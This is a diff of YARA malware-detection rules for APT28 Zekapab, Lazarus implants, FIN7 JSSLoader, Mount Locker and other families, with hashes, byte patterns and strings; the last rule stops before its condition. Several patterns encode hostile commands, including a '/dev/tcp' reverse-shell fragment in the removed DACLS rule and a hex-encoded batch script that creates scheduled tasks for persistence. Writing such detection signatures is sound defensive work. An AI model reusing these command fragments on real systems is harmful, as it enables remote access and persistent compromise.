+rule ARKBIRD_SOLG_APT_APT28_Zekapab_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect the trojan downloader used by Donot group"
+		description = "Detect Zekapab used by APT28 group"
 		author = "Arkbird_SOLG"
-		id = "251a809e-9e36-5c46-955f-006531bd9619"
-		date = "2020-05-09"
-		modified = "2021-05-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/Donot/APT_Donot_Downloader_May_2021_1.yara#L1-L20"
+		id = "634f32dd-8bcf-5c58-a335-9b66ff568a54"
+		date = "2021-03-15"
+		modified = "2021-03-15"
+		reference = "https://twitter.com/DrunkBinary/status/1371423755608719360"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-15/APT28/APT_APT28_Zekapab_Mar_2021_1.yar#L1-L25"
 		license_url = "N/A"
-		logic_hash = "df64ab97b74935ce8b73c3854eb81fa1dbd4e59b1e27c43ae9c85b90aaaef6f7"
-		score = 75
-		quality = 75
+		logic_hash = "dabaab47c193a05620d282a00b6b47f710cfa6b1efc699ea5d47267d10cfdcb6"
+		score = 60
+		quality = 23
 		tags = "FILE"
-		hash1 = "28aa296bda12f0184564c5f6b46e679f07255aa8df58b861ea17910cdcaa674a"
-		hash2 = "03730cdc23a3d10c8752ad1464ff2e68a64c69f8310b0ceea4d52b1db0215dfc"
-		hash3 = "edd590c343570f7576aca83da58967e058585c6ba861682dca2fc987c713ee3a"
-		tlp = "White"
-		adversary = "Donot"
+		hash1 = "eae62bb4110bcd00e9d1bcaba9000defcda3d1ab832fa2634d928559d066cb15"
 
 	strings:
-		$seq1 = { 65 63 68 6f 20 6f 66 66 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 64 65 6c 20 2f 66 20 25 73 20 0a 20 53 45 54 20 2f 41 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 20 0a 20 53 45 54 20 2f 41 20 52 41 4e 44 3d 25 25 52 41 4e 44 4f 4d 25 25 20 31 30 30 30 30 20 2b 20 32 20 0a 20 65 63 68 6f 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 2d 25 25 52 41 4e 44 25 25 20 3e 3e 20 25 73 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 6f 62 55 70 64 61 74 65 20 2f 66 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 32 30 20 2f 66 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 74 72 20 25 73 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 31 30 20 2f 66 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 74 72 20 25 73 20 0a 20 6d 6f 76 65 20 25 25 41 50 50 44 41 54 41 25 }
-		$seq2 = { c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 c7 04 24 ?? 42 [2] e8 ?? 01 00 00 83 ec 14 [0-3] c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 [2-5] 24 04 [0-3] 89 04 24 e8 ?? 01 00 00 83 ec 18 89 [1-9] c7 44 24 04 ?? 43 [2] c7 04 24 ?? 61 [2] e8 ?? 08 00 00 }
-		$s1 = "VirtualQuery failed for %d bytes at address %p" fullword ascii
-		$s2 = { 25 73 5c [1-14] 2e 62 61 74 }
-		$s3 = { 25 73 5c [1-14] 25 }
+		$s1 = { 68 74 74 70 3A 2F 2F }
+		$s2 = { 68 74 74 70 73 3A 2F 2F }
+		$s3 = { 32 44 34 46 37 30 36 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 32 44 }
+		$s4 = { 35 30 34 33 32 30 34 45 36 31 36 44 36 35 33 41 32 30 }
+		$s5 = { 34 42 34 32 37 32 36 34 32 30 34 43 36 31 36 45 36 37 33 41 32 30 }
+		$s6 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 }
+		$header1 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 }
+		$header2 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 }
+		$dbg1 = { 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 0d 00 4e 00 6f 00 74 00 20 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 }
+		$dbg2 = { 53 00 79 00 73 00 74 00 65 00 6d 00 20 00 45 00 72 00 72 00 6f 00 72 00 2e 00 20 00 20 00 43 00 6f 00 64 00 65 00 3a 00 20 00 25 00 64 00 2e 00 0d 00 0a 00 25 00 73 }
+		$dbg3 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 00 2e 00 0a 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 2e }
+		$dbg4 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 }
+		$dbg5 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 00 2e }
+		$dbg6 = { 53 00 6f 00 63 00 6b 00 65 00 74 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 23 00 20 00 25 00 64 00 0d 00 0a 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $seq* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 1 of ( $header* ) and 3 of ( $s* ) and 4 of ( $dbg* )
 }
-rule ARKBIRD_SOLG_RAN_Fuxsocy_May_2021_1 : FILE
+
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Implant_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect FuxSocy ransomware"
+		description = "Detect Lazarus implant June 2020"
 		author = "Arkbird_SOLG"
-		id = "2420c2fa-bc94-51a6-87ab-4e8d226fdd23"
-		date = "2020-05-09"
-		modified = "2021-05-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/FuxSocy/RAN_FuxSocy_May_2021_1.yara#L1-L19"
+		id = "602c33f2-1e34-5267-9154-ada2d6edc64b"
+		date = "2020-06-28"
+		modified = "2020-06-28"
+		reference = "https://twitter.com/ccxsaber/status/1277064824434745345"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT_NK_Lazarus_Implant_June_2020_1.yar#L3-L23"
 		license_url = "N/A"
-		logic_hash = "ab34f95d2b12bdf2d362538e880301542c3308fff427cfb5ee59e9dca89ec033"
+		logic_hash = "29b6b8d3bdd47707854ed0dc00808d6352934950a8e7244450df78422ff3cb15"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "d786355c1b3dc741103873aed46d8ffa3430d113a27482f37f3ffc7c978747f6"
-		hash2 = "43bbfb3389deb3846bba19a8ab2e9c8fd9b581720962b8170d4a63ad816b5804"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "21afaceee5fab15948a5a724222c948ad17cad181bf514a680267abcce186831"
 
 	strings:
-		$seq1 = { b8 48 14 00 00 e8 b8 83 00 00 53 55 56 8d 44 24 48 8b e9 50 55 89 54 24 14 33 f6 ff 15 84 02 41 00 8b d8 85 db 0f 84 fa 00 00 00 57 8b cb e8 2b 09 00 00 8b f8 85 ff 0f 84 e7 00 00 00 57 53 56 55 ff 15 8c 02 41 00 8b 1d 78 02 41 00 8d 44 24 18 50 8d 44 24 18 50 68 cc 14 48 00 57 89 74 24 24 89 74 24 28 ff d3 83 7c 24 18 04 0f 82 ab 00 00 00 8b 44 24 10 8b 4c 24 14 c7 44 24 1c 00 15 48 00 c7 44 24 20 14 15 48 00 c7 44 24 24 30 15 48 00 c7 44 24 28 48 15 48 00 c7 44 24 2c 60 15 48 00 c7 44 24 30 80 15 48 00 c7 44 24 34 a0 15 48 00 c7 44 24 38 c0 15 48 00 c7 44 24 3c e0 15 48 00 c7 44 24 40 fc 15 48 00 c7 44 24 44 14 16 48 00 c7 44 24 48 38 16 48 00 ff 74 84 1c 0f b7 41 02 50 0f b7 01 50 8d 44 24 60 68 54 16 48 00 50 ff 15 64 02 41 00 83 c4 14 8d 44 24 50 50 8d 44 24 14 50 8d 44 24 5c 50 57 ff d3 85 c0 74 0d 8b 4c 24 10 33 d2 e8 47 0a 00 00 8b f0 8b cf e8 c9 08 00 00 5f 8b c6 5e 5d 5b 81 c4 48 14 00 00 }
-		$seq2 = { 8d 44 24 50 50 8d 44 24 4c 50 8d 44 24 2c 50 55 ff 15 ec 00 41 00 8b 44 24 14 8b 74 24 18 ff 74 24 68 88 87 57 01 08 00 66 a1 80 4d 41 00 [10] 88 9f 54 01 08 00 c6 87 63 01 08 00 10 89 b7 58 01 08 00 66 89 87 5d 01 08 00 ff 15 6c 00 41 00 0f b6 97 63 01 08 00 03 c0 66 89 87 55 01 08 00 8b 44 24 20 8d 8f 64 01 08 00 88 87 5c 01 08 00 e8 14 2b 00 00 8b 44 24 14 0f b6 c8 0f b7 87 55 01 08 00 83 c1 03 8d 0c c8 89 8f 4c 01 08 00 e8 2e 3a 00 00 8b c8 89 8f 48 01 08 00 85 c9 0f 84 0f 01 00 00 8b 44 24 28 89 41 04 8b 8f 48 01 08 00 8b 44 24 24 89 01 8b 8f 48 01 08 00 8b 44 24 4c 89 41 0c 8b 8f 48 01 08 00 8b 44 24 48 89 41 08 8b 8f 48 01 08 00 8b 44 24 54 89 41 14 8b 8f 48 01 08 00 8b 44 24 50 89 41 10 0f b7 87 55 01 08 00 50 8b 87 48 01 08 00 ff 74 24 6c 83 c0 18 50 e8 b4 b5 00 00 8b 4c 24 6c 33 d2 e8 bd 3b 00 00 8b 4c 24 70 33 d2 89 47 08 e8 af 3b 00 00 0f b6 97 63 01 08 00 89 47 0c 8b 44 24 78 89 87 28 02 08 00 8b 44 24 44 89 47 04 8d 87 44 00 08 00 50 8d 8f 64 01 08 00 89 2f e8 4d 24 00 00 89 b7 18 02 08 00 8b 87 c5 01 08 00 f7 a7 58 01 08 00 8b c8 0f b6 87 5c 01 08 00 8b f2 99 83 c4 10 ff b7 28 02 08 00 03 c8 13 f2 03 0d 80 4d 41 00 13 35 84 4d 41 00 89 8f 1c 02 08 00 89 b7 20 02 08 00 ff 15 c4 00 41 00 53 57 ff 74 24 44 55 ff 15 e8 00 41 00 }
-		$seq3 = { 57 68 ff 01 0f 00 ff 75 08 8b fa 51 32 db ff 15 0c 00 41 00 8b f0 85 f6 74 76 32 ff eb 52 84 ff 75 65 33 c0 50 50 50 50 50 50 50 6a ff 6a 04 6a ff 56 ff 15 10 00 41 00 8b 45 c0 83 f8 01 74 2c 76 2e 83 f8 03 76 1a 83 f8 04 75 24 8d 45 e0 50 6a 01 56 ff 15 18 00 41 00 }
-		$seq4 = { 6a ff 8d 45 fc 50 8d 45 08 50 8d 45 f8 50 ff 33 33 ff 89 7d f8 89 7d 08 89 7d fc ff 15 c8 00 41 00 85 c0 8b 45 08 0f 95 c1 85 c0 74 59 56 }
-		$seq5 = { 8b 45 08 56 ff 70 08 ff 15 dc 00 41 00 8b ce e8 af 2e 00 00 33 ff 57 ff 75 08 57 ff 33 ff 15 e4 }
+		$s1 = "Upgrade.exe" fullword ascii
+		$s2 = "ver=%d&timestamp=%lu" fullword ascii
+		$s3 = "_update.php" fullword ascii
+		$s4 = "Dorusio Wallet 2.1.0 (Check Update Windows)" fullword wide
+		$s5 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
+		$s6 = "CONOUT$" fullword ascii
+		$s7 = "D$8fD;i" fullword ascii
+		$s8 = "WinHttpOpenRequest" fullword ascii
+		$s9 = "HTTP/1.0" fullword ascii
+		$s10 = "POST" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 3 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "565005404f00b7def4499142ade5e3dd" or 6 of them )
 }
-rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Dacls_June_2020_1 : FILE
+
+rule ARKBIRD_SOLG_APT28_Zekapab_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect DACLS malware used by APT Lazarus"
+		description = "Detect Delphi variant of Zekapab"
 		author = "Arkbird_SOLG"
-		id = "fb85b83a-4367-5f1d-be06-8a8e906b8df7"
-		date = "2020-06-11"
-		modified = "2020-06-12"
-		reference = "https://twitter.com/batrix20/status/1270924079826997248"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L3-L26"
+		id = "cf87e67f-2db9-537d-8800-8cd47b47c276"
+		date = "2020-06-28"
+		modified = "2020-06-28"
+		reference = "https://twitter.com/DrunkBinary/status/1276573779037163520"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT28_Zekapab_June_2020_1.yar#L3-L29"
 		license_url = "N/A"
-		logic_hash = "ed3e4a7a0490c5e8854d4e1bc8a223658ab9657a03c1b237af1056293a51611b"
+		logic_hash = "a02a78b8f60cf9d4441cc18b70fd00ec89253a5feafdc0eb392486b575bc61e2"
 		score = 75
-		quality = 48
+		quality = 25
 		tags = "FILE"
-		hash1 = "2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b"
+		hash1 = "12879b9d8ae046ca2f2ebcc7b1948afc44e6e654b7f4746e7a5243267cfd7c46"
 
 	strings:
-		$s1 = "bash -i > /dev/tcp/" fullword ascii
-		$s2 = "__mh_execute_header" fullword ascii
-		$s3 = "/bin/bash -c \"" fullword ascii
-		$s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" fullword ascii
-		$s5 = "@_gethostbyname" fullword ascii
-		$s6 = "@_gethostname" fullword ascii
-		$s7 = "radr://5614542" fullword ascii
-		$s8 = "sh -c \"" fullword ascii
-		$s9 = "content-type: multipart/form-data" fullword ascii
-		$s10 = "@___stack_chk_fail" fullword ascii
-		$s11 = "/usr/lib/libSystem.B.dylib" fullword ascii
-		$s12 = "@dyld_stub_binder" fullword ascii
+		$s1 = "54484520494E535452554354494F4E2041542030783763663538326164205245464552454E434544204D454D4F525920415420307830303030303030302E2054" ascii
+		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$s3 = "5C4164646974696F6E735C73616D636C69656E742E657865" ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
+		$s5 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" fullword ascii
+		$s6 = "Software\\Borland\\Delphi\\Locales" fullword ascii
+		$s7 = "SOFTWARE\\Borland\\Delphi\\RTL" fullword ascii
+		$s8 = "Software\\Borland\\Locales" fullword ascii
+		$s9 = "FastMM Borland Edition" fullword ascii
+		$s10 = "#7@Qhq\\1@NWgyxeH\\_bpdgc" fullword ascii
+		$s11 = "4150504C49434154494F4E204552524F52" ascii
+		$s12 = "436D442E457865202F6320" ascii
+		$s13 = "6572726F72" ascii
+		$s14 = "WndProcPtr" fullword ascii
+		$s15 = "Request.UserAgent" fullword ascii
+		$s16 = "ProxyPassword<" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xfacf and filesize < 200KB and 10 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "dbdfe8b60c1de0a9201044b3e91b9502" or 12 of them )
 }
-
-rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Nukesped_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Jssloader_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect NukeSped malware used by APT Lazarus"
+		description = "Detect JSSLoader malware"
 		author = "Arkbird_SOLG"
-		id = "7a5b27df-43bd-544d-8d0f-72e58ce3064c"
-		date = "2020-06-11"
-		modified = "2020-06-12"
-		reference = "https://twitter.com/batrix20/status/1270924079826997248"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L28-L54"
+		id = "192b1386-f0bc-54e8-9341-84f77f4f07c5"
+		date = "2021-06-04"
+		modified = "2021-06-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-04/FIN7/MAL_JSSLoader_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "b1332eb255f8ae9ae6a68ef8ef86d9f5472584cae8161c27186e341990df7eae"
+		logic_hash = "73942afed6b3471be07be1fba3e7f90ec7f2377a1167aeef70627cd07faa3681"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b"
+		hash1 = "59c6acc8f6771ea6eeb8d8f03832642d87f9aa7eb0c3205398d31ad08e019a9c"
+		hash2 = "2609c6ec5d4fdde28d29c272484da66e0995e529cf302ed46f94c68cd99352e3"
+		hash3 = "ea167f5460c5f920699e276fb0c51f32c862256415c57edb4bda5760a70b9e4d"
+		hash4 = "822457c427a0776b41dd8f3479070e56fdd53ccd0175418d4e7d85065ec7d7d1"
+		tlp = "White"
+		adversary = "FIN7"
 
 	strings:
-		$s1 = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" fullword wide
-		$s2 = "<htr<jtb<lt6<tt&<wt" fullword ascii
-		$s3 = "Content-Disposition: form-data; name=\"file\"; filename=\"%s\"" fullword ascii
-		$s4 = "Content-Type: multipart/form-data; boundary=" fullword wide
-		$s5 = "POST" fullword ascii
-		$s6 = "Content-Type: octet-stream" fullword ascii
-		$s7 = "CONOUT$" fullword ascii
-		$s8 = "cmd.exe /c" fullword ascii
-		$s9 = "2>&1" fullword ascii
-		$s10 = "WINHTTP.dll" fullword ascii
-		$s11 = "WinHttpSendRequest" fullword wide
-		$s12 = "ObtainUserAgentString" fullword ascii
-		$s13 = "WS2_32.dll" fullword ascii
-		$s14 = "WinHttpReceiveResponse" fullword ascii
-		$s15 = "GetLogicalDrives" fullword ascii
+		$s1 = { 8b 45 c8 83 78 0c 00 0f 84 ce 00 00 00 8b 45 c8 8b 4d 08 03 48 0c 8b f4 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 bc 83 7d bc 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d 08 03 48 10 89 4d f8 8b 45 c8 8b 4d 08 03 08 89 4d ec 8b 45 ec 3b 45 08 75 06 8b 45 f8 89 45 ec 8b 45 ec 83 38 00 74 6c 8b 45 ec 8b 08 81 e1 00 00 00 }
+		$s2 = { 8b f4 6a 04 68 00 10 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 f8 83 7d f8 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 8b 45 c8 8b 08 51 8b 55 f8 52 e8 [2] 00 00 83 c4 0c 8b f4 8b 45 f8 50 8b fc ff 15 [3] 00 3b fc e8 [2] 00 00 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b f4 6a 04 68 00 10 00 00 68 00 11 00 00 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 ec 83 7d ec 00 75 02 eb 3e 8b 45 c8 8b 48 08 8b 11 89 55 e0 83 7d e0 ff 75 0c c7 85 00 ff ff ff 00 00 00 00 eb 09 8b 45 e0 89 85 00 ff ff ff 8b 8d 00 ff ff ff 8b 55 ec 8b 45 f8 89 04 8a 8b 45 ec 64 a3 2c 00 00 00 5f 5e 5b 81 c4 00 01 00 00 3b ec e8 [2] 00 00 8b e5 5d }
+		$s3 = { c7 45 f0 61 00 00 00 c7 45 c8 20 00 00 00 c7 45 cc 88 00 00 00 c7 45 dc 01 00 00 00 8d 45 f0 89 45 d0 33 c0 66 89 45 d4 c7 45 d8 00 00 00 00 c7 45 e0 00 00 00 00 8b 45 08 89 45 e4 8b f4 8d 45 c8 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 b0 83 7d b0 ff 74 17 8b f4 8d 45 bc 50 8b 4d b0 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 52 8b cd 50 8d 15 2c 13 40 00 e8 [2] 00 00 58 5a 5f 5e 5b 8b 4d fc 33 cd e8 [2] 00 00 81 c4 2c 01 00 00 3b ec e8 [2] 00 00 8b e5 }
+		$s4 = { 8b 45 ec 8b 08 81 e1 ff ff 00 00 8b f4 51 8b 55 bc 52 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 4d f8 89 01 eb 25 8b 45 ec 8b 08 8b 55 08 8d 44 0a 02 8b f4 50 8b 4d bc 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 55 f8 89 02 8b 45 f8 83 c0 04 89 45 f8 8b 45 ec 83 c0 04 89 45 ec eb 8c 8b 45 c8 83 c0 14 89 45 c8 e9 25 ff ff ff 5f 5e 5b 81 c4 08 01 00 00 3b ec e8 [2] 00 00 8b e5 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "c8379f0eeeb3a522f1dd75aa5f1500b0" or 12 of them )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and filesize < 900KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Klingon_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Mount_Locker_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect the Klingon RAT"
+		description = "Detect Mount Locker ransomware (November 2020 variant)"
 		author = "Arkbird_SOLG"
-		id = "bf114c4d-3010-5b34-954e-82794e30edcb"
-		date = "2021-06-19"
-		modified = "2021-06-21"
-		reference = "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-20/Klingon/MAL_Klingon_Jun_2021_1.yara#L1-L18"
+		id = "20fde6f4-ef7d-57c4-8cc2-a6ea810c2b0c"
+		date = "2020-11-20"
+		modified = "2020-11-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Mount Locker/Ran_Mount_Locker_Nov_2020_1.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "283452d24edea988dc353fada4cd1e050db244a48cc6ab30f70e1900ca9c7c2f"
+		logic_hash = "028e89e9c0c46ac5c36fee5cbfba068b4c6c1f53aa224e454ebd358f2c6ae9a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "44237e2de44a533751c0baace09cf83293572ae7c51cb4575e7267be289c6611"
-		hash2 = "c98bb0649262277ec9dd16cf27f8b06042ff552535995f2bdd3355d2adeff801"
-		hash3 = "e8eea442e148c81f116de31b4fc3d0aa725c5dbbbd840b446a3fb9793d0b9f26"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037"
+		hash2 = "226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2"
 
 	strings:
-		$seq1 = { 81 3a 70 72 6f 78 0f 85 [2] 00 00 80 7a 04 79 0f 84 [2] 00 00 48 83 f9 05 75 12 81 3a 73 68 65 6c 75 0a 80 7a 04 6c 0f 84 [2] 00 00 48 83 f9 06 75 14 81 3a 62 69 6e 61 75 0c 66 81 7a 04 72 79 0f 84 [2] 00 00 48 83 f9 03 0f 85 ?? 04 00 00 66 81 3a 63 6d 0f 85 [2] 00 00 80 7a 02 64 0f 84 [2] 00 00 48 83 f9 06 }
-		$seq2 = { 48 8d 05 [3] 00 48 89 ?? 24 [1-4] 48 c7 84 24 ?? 00 00 00 ?? 00 00 00 48 8d 0d [3] 00 48 89 ?? 24 [0-4] 48 c7 ?? 24 }
-		$seq3 = { 48 8d 0d [3] 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 89 84 24 ?? 00 00 00 48 8d 05 [3] 00 48 89 04 24 48 c7 44 24 08 08 00 00 00 48 8d 84 24 ?? 00 00 00 48 89 44 24 10 48 c7 44 24 18 03 00 00 00 48 c7 44 24 20 03 00 00 00 e8 [3] ff 48 8b 44 24 30 48 89 44 24 58 48 8b 4c 24 28 48 89 8c 24 ?? 00 00 00 }
+		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword wide
+		$s2 = "VBA6.DLL" fullword ascii
+		$s3 = "MSComDlg.CommonDialog" fullword ascii
+		$s4 = "DllFunctionCall" fullword ascii
+		$s5 = { 00 2a 00 5c 00 41 00 43 00 3a 00 5c [35-160] 00 2e 00 76 00 62 00 70 }
+		$s6 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\COMCTL32.oca" fullword wide
+		$s7 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\MSFLXGRD.oca" fullword ascii
+		$s8 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+		$s9 = "SFLXGRD.OCX" fullword ascii
+		$s10 = "COMDLG32.OCX" fullword ascii
+		$s11 = "COMCTL32.OCX" fullword ascii
+		$seq1 = { 42 00 24 00 40 00 43 00 67 00 2f 00 44 00 08 00 4a 00 51 00 77 00 54 00 76 00 25 00 55 00 48 00 00 00 00 00 5d 00 4c 00 09 00 53 00 3e 00 73 00 62 00 52 00 50 00 0b 00 61 00 01 00 61 01 3a 00 03 00 57 00 4f 00 75 00 54 00 71 00 22 00 53 00 37 00 00 00 30 00 1d 00 46 00 5a 00 5c 00 48 00 78 00 63 00 02 00 1d 00 23 00 3b 00 28 00 55 00 73 00 28 00 61 00 3b 00 00 00 00 00 44 00 4e 00 4a 00 4d 00 61 00 40 00 59 00 2b 00 38 00 02 01 04 01 54 00 08 00 52 00 56 00 1d 00 42 00 3e 00 00 00 00 00 35 00 70 00 3b 00 37 00 6f 00 26 00 26 00 40 00 64 00 02 00 51 00 3c 00 41 00 16 00 3e 00 00 00 47 00 58 00 33 00 89 00 54 00 2d 00 29 00 50 00 04 00 59 00 5d 00 4f 00 1b 00 36 00 30 00 83 00 41 00 00 00 2a 00 54 00 47 00 86 00 56 00 19 00 24 00 4e 00 3a 00 45 00 51 00 4d 00 1e 00 3b 00 2b 00 81 00 35 00 00 00 3a 00 65 00 57 00 03 00 2d 00 62 00 53 }
